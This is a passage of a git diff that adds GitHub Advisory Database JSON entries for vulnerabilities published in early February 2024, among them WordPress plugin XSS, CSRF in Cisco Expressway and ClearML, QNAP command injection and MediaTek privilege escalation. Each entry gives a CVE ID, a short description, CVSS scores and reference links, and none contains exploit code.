+ "CVE-2024-0371" + ], + "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'create_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0371" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vx2f-5c28-4wg3/GHSA-vx2f-5c28-4wg3.json b/advisories/unreviewed/2024/02/GHSA-vx2f-5c28-4wg3/GHSA-vx2f-5c28-4wg3.json new file mode 100644 index 0000000000000..9953dbc3cdc4e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vx2f-5c28-4wg3/GHSA-vx2f-5c28-4wg3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vx2f-5c28-4wg3", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-24061" + ], + "details": "springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sysContent/add.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24061" + }, + { + "type": "WEB", + "url": "https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#13-stored-cross-site-scripting-syscontentadd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w4qh-vg3x-929v/GHSA-w4qh-vg3x-929v.json b/advisories/unreviewed/2024/02/GHSA-w4qh-vg3x-929v/GHSA-w4qh-vg3x-929v.json new file mode 100644 index 0000000000000..1430345e85d29 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w4qh-vg3x-929v/GHSA-w4qh-vg3x-929v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4qh-vg3x-929v", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45025" + ], + "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45025" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-47" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w4r6-2p3v-r8w8/GHSA-w4r6-2p3v-r8w8.json b/advisories/unreviewed/2024/02/GHSA-w4r6-2p3v-r8w8/GHSA-w4r6-2p3v-r8w8.json new file mode 100644 index 0000000000000..463c0c847bf8d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w4r6-2p3v-r8w8/GHSA-w4r6-2p3v-r8w8.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4r6-2p3v-r8w8", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20012" + ], + "details": "In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358566; Issue ID: ALPS08358566.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20012" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w57g-4hpj-6p36/GHSA-w57g-4hpj-6p36.json b/advisories/unreviewed/2024/02/GHSA-w57g-4hpj-6p36/GHSA-w57g-4hpj-6p36.json new file mode 100644 index 0000000000000..2471f4a18a068 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w57g-4hpj-6p36/GHSA-w57g-4hpj-6p36.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w57g-4hpj-6p36", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-6676" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in National Keep Cyber Security Services CyberMath allows Cross Site Request Forgery.This issue affects CyberMath: from v1.4 before v1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6676" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0080" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w636-mh7p-cc94/GHSA-w636-mh7p-cc94.json b/advisories/unreviewed/2024/02/GHSA-w636-mh7p-cc94/GHSA-w636-mh7p-cc94.json new file mode 100644 index 0000000000000..1e10f537d88ce --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w636-mh7p-cc94/GHSA-w636-mh7p-cc94.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w636-mh7p-cc94", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-23034" + ], + "details": "Cross Site Scripting vulnerability in the input parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23034" + }, + { + "type": "WEB", + "url": "https://github.com/weng-xianhu/eyoucms/issues/57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w65c-vwf8-cxjv/GHSA-w65c-vwf8-cxjv.json b/advisories/unreviewed/2024/02/GHSA-w65c-vwf8-cxjv/GHSA-w65c-vwf8-cxjv.json new file mode 100644 index 0000000000000..8a71633ab67fb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w65c-vwf8-cxjv/GHSA-w65c-vwf8-cxjv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w65c-vwf8-cxjv", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2024-20254" + ], + "details": "Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks that perform arbitrary actions on an affected device. \n\n Note: \"Cisco Expressway Series\" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.\n\n For more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20254" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w6f5-cfrr-rg5r/GHSA-w6f5-cfrr-rg5r.json b/advisories/unreviewed/2024/02/GHSA-w6f5-cfrr-rg5r/GHSA-w6f5-cfrr-rg5r.json new file mode 100644 index 0000000000000..48c25ae9720d8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w6f5-cfrr-rg5r/GHSA-w6f5-cfrr-rg5r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6f5-cfrr-rg5r", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24838" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Five Star Plugins Five Star Restaurant Reviews allows Stored XSS.This issue affects Five Star Restaurant Reviews: from n/a through 2.3.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24838" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/good-reviews-wp/wordpress-five-star-restaurant-reviews-plugin-2-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w6j5-fp4m-crpf/GHSA-w6j5-fp4m-crpf.json b/advisories/unreviewed/2024/02/GHSA-w6j5-fp4m-crpf/GHSA-w6j5-fp4m-crpf.json new file mode 100644 index 0000000000000..f895f09cf578f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w6j5-fp4m-crpf/GHSA-w6j5-fp4m-crpf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6j5-fp4m-crpf", + "modified": "2024-02-06T15:32:08Z", + "published": "2024-02-06T15:32:08Z", + "aliases": [ + "CVE-2024-24593" + ], + "details": "A cross-site request forgery (CSRF) vulnerability in all versions of the api and web server components of Allegro AI’s ClearML platform allows a remote attacker to impersonate a user by sending API requests via maliciously crafted html. Exploitation of the vulnerability allows an attacker to compromise confidential workspaces and files, leak sensitive information, and target instances of the ClearML platform within closed off networks.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24593" + }, + { + "type": "WEB", + "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w759-3hj5-qw74/GHSA-w759-3hj5-qw74.json b/advisories/unreviewed/2024/02/GHSA-w759-3hj5-qw74/GHSA-w759-3hj5-qw74.json new file mode 100644 index 0000000000000..48d3115186135 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w759-3hj5-qw74/GHSA-w759-3hj5-qw74.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w759-3hj5-qw74", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20013" + ], + "details": "In keyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08471742; Issue ID: ALPS08308608.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20013" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-w8m7-jp57-83vr/GHSA-w8m7-jp57-83vr.json b/advisories/unreviewed/2024/02/GHSA-w8m7-jp57-83vr/GHSA-w8m7-jp57-83vr.json new file mode 100644 index 0000000000000..438bf4589ae8e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-w8m7-jp57-83vr/GHSA-w8m7-jp57-83vr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8m7-jp57-83vr", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-24871" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative Themes Blocksy allows Stored XSS.This issue affects Blocksy: from n/a through 2.0.19.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24871" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/blocksy/wordpress-blocksy-theme-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wc7r-64xv-6vgw/GHSA-wc7r-64xv-6vgw.json b/advisories/unreviewed/2024/02/GHSA-wc7r-64xv-6vgw/GHSA-wc7r-64xv-6vgw.json new file mode 100644 index 0000000000000..f68cc0fd99808 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wc7r-64xv-6vgw/GHSA-wc7r-64xv-6vgw.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc7r-64xv-6vgw", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1259" + ], + "details": "A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/controllers/admin/app/AppController.php of the component API. The manipulation of the argument app_pic_url leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252998 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1259" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/rCt6PpJxBvuI" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252998" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252998" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json b/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json new file mode 100644 index 0000000000000..5a37a5566e965 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcj2-j3c5-773j", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24014" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/author/list", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24014" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24014.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wcmq-fchf-hwch/GHSA-wcmq-fchf-hwch.json b/advisories/unreviewed/2024/02/GHSA-wcmq-fchf-hwch/GHSA-wcmq-fchf-hwch.json new file mode 100644 index 0000000000000..a203357e1d054 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wcmq-fchf-hwch/GHSA-wcmq-fchf-hwch.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcmq-fchf-hwch", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24499" + ], + "details": "SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtfullname and txtphone parameters in the edit_profile.php component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24499" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-SQL_Injection_Admin_Update_Profile.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wcpf-fg4c-h6ph/GHSA-wcpf-fg4c-h6ph.json b/advisories/unreviewed/2024/02/GHSA-wcpf-fg4c-h6ph/GHSA-wcpf-fg4c-h6ph.json new file mode 100644 index 0000000000000..95ddbba94b424 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wcpf-fg4c-h6ph/GHSA-wcpf-fg4c-h6ph.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcpf-fg4c-h6ph", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0585" + ], + "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the Image URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0585" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wf5c-mcqp-r6mq/GHSA-wf5c-mcqp-r6mq.json b/advisories/unreviewed/2024/02/GHSA-wf5c-mcqp-r6mq/GHSA-wf5c-mcqp-r6mq.json new file mode 100644 index 0000000000000..ff192faf63636 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wf5c-mcqp-r6mq/GHSA-wf5c-mcqp-r6mq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf5c-mcqp-r6mq", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-45213" + ], + "details": "\n\n\n\n\n\n\nA potential attacker with access to the Westermo Lynx device would be able to execute malicious code that could affect the correct functioning of the device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45213" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-942" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wf9p-gjmq-pmx9/GHSA-wf9p-gjmq-pmx9.json b/advisories/unreviewed/2024/02/GHSA-wf9p-gjmq-pmx9/GHSA-wf9p-gjmq-pmx9.json new file mode 100644 index 0000000000000..3a0b77ef946b0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wf9p-gjmq-pmx9/GHSA-wf9p-gjmq-pmx9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf9p-gjmq-pmx9", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0380" + ], + "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 9.1.0 via the 'icon' attribute used in Shortcodes. This makes it possible for authenticated attackers, with contributor-level access and above, to include the contents of SVG files on the server, which can be leveraged for Cross-Site Scripting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0380" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wfhx-9fx9-r5gm/GHSA-wfhx-9fx9-r5gm.json b/advisories/unreviewed/2024/02/GHSA-wfhx-9fx9-r5gm/GHSA-wfhx-9fx9-r5gm.json new file mode 100644 index 0000000000000..5cef66e1e9815 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wfhx-9fx9-r5gm/GHSA-wfhx-9fx9-r5gm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfhx-9fx9-r5gm", + "modified": "2024-02-08T15:30:26Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2023-6517" + ], + "details": "Exposure of Sensitive Information Due to Incompatible Policies vulnerability in Mia Technology Inc. MİA-MED allows Collect Data as Provided by Users.This issue affects MİA-MED: before 1.0.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6517" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0087" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-213" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wfj3-hjp7-62gf/GHSA-wfj3-hjp7-62gf.json b/advisories/unreviewed/2024/02/GHSA-wfj3-hjp7-62gf/GHSA-wfj3-hjp7-62gf.json new file mode 100644 index 0000000000000..f0fbbadb96c2d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wfj3-hjp7-62gf/GHSA-wfj3-hjp7-62gf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfj3-hjp7-62gf", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33060" + ], + "details": "Transient DOS in Core when DDR memory check is called while DDR is not initialized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33060" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-whq9-vwxq-6f23/GHSA-whq9-vwxq-6f23.json b/advisories/unreviewed/2024/02/GHSA-whq9-vwxq-6f23/GHSA-whq9-vwxq-6f23.json new file mode 100644 index 0000000000000..095dbc18d6814 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-whq9-vwxq-6f23/GHSA-whq9-vwxq-6f23.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whq9-vwxq-6f23", + "modified": "2024-02-05T18:31:37Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-0953" + ], + "details": "When a user scans a QR Code with the QR Code Scanner feature, the user is not prompted before being navigated to the page specified in the code. This may surprise the user and potentially direct them to unwanted content.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0953" + }, + { + "type": "WEB", + "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1837916" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-whv2-8g4p-xpx6/GHSA-whv2-8g4p-xpx6.json b/advisories/unreviewed/2024/02/GHSA-whv2-8g4p-xpx6/GHSA-whv2-8g4p-xpx6.json new file mode 100644 index 0000000000000..586417e767482 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-whv2-8g4p-xpx6/GHSA-whv2-8g4p-xpx6.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whv2-8g4p-xpx6", + "modified": "2024-02-07T18:30:27Z", + "published": 